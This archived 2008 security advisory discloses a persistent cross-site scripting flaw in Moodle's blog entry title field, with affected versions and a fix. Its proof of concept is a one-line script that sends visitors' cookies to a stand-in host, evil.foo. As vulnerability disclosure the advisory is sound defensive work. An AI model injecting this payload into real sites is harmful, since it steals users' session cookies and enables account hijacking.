lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 22 Jul 2008 16:46:23 +0100
From: ProCheckUp Research <research@...checkup.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: PR08-13: Persistent Cross-site Scripting (XSS) on
 Moodle via blog entry title

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

PR08-13: Persistent Cross-site Scripting (XSS) on Moodle via blog entry
title

Vulnerability found: 20/06/2008

Vendor informed: 25/06/2008

Vulnerability fixed: 16/07/2008

Advisory publicly released: 22/07/2008

Severity: High

Description:

By creating a new blog entry ('/blog/edit.php') with a malicious entry
title ('etitle' parameter), it is possible to inject unrestricted
JavaScript and HTML *persistently* into the application. The malicious
code would be returned (and executed) on the main blog section of the
site ('/blog/') which can be viewed by any type of account (i.e.: guest,
student, teacher, administrator, etc).


Notes:

- - Prerequisite for successful exploitation is blogs being enabled and
attacker's account having capabilities to add new entries.

- - Moodle reveals its version within HTML source code. i.e.: <a
title="moodle 1.6.5 + (2006050550)" href="http://moodle.org/">

Proof of concept:

Example of malicious code to be injected as a new blog entry title. Such
code forwards the cookies of any users who access the blog section of
the site to a third-party website:

<script>location='http://evil.foo/x.php?'+document.cookie</script>

The proof of concept was tested on the following environment:

Server: Apache/2.2.2 (Unix) PHP/5.2.1 mod_ssl/2.2.2 OpenSSL/0.9.7l
Moodle 1.6.5 + (2006050550)

Consequences:

It is possible to hijack any account (including privileged ones) by
stealing the victim's session ID (stored in cookies), or inject a spoof
HTML login form for phishing purposes. Other attacks are also possible.

Versions affected as confirmed by the vendor:

1.7.3, 1.7.4, 1.6.5, 1.7.2, 1.7.1, 1.7, 1.6.6, 1.6.4, 1.6.3, 1.6.2,
1.6.1, 1.6

Fix:

Upgrade to 1.6.7, 1.7.5 or any recent nightly or use patch
http://cvs.moodle.org/moodle/blog/lib.php?r1=1.38.6.3&r2=1.38.6.2

This issue has been tracked as MDL-15392.


References:

http://moodle.org/mod/forum/discuss.php?d=101401
http://www.procheckup.com/Vulnerabilities.php

Credits: Adrian Pastor and Amir Azam of ProCheckUp Ltd. (www.procheckup.com)

ProCheckUp would like to thank Petr Skoda and the rest of the Moodle
team for their excellent response time and cooperation towards resolving
this matter.

Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFIhgDPoR/Hvsj3i8sRApqFAJ448lzgmoz6wsIwndxlKp6Aho0XdACfb/8N
DWov7Q8NG1otTxbxtL2R4U8=
=Zfxc
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ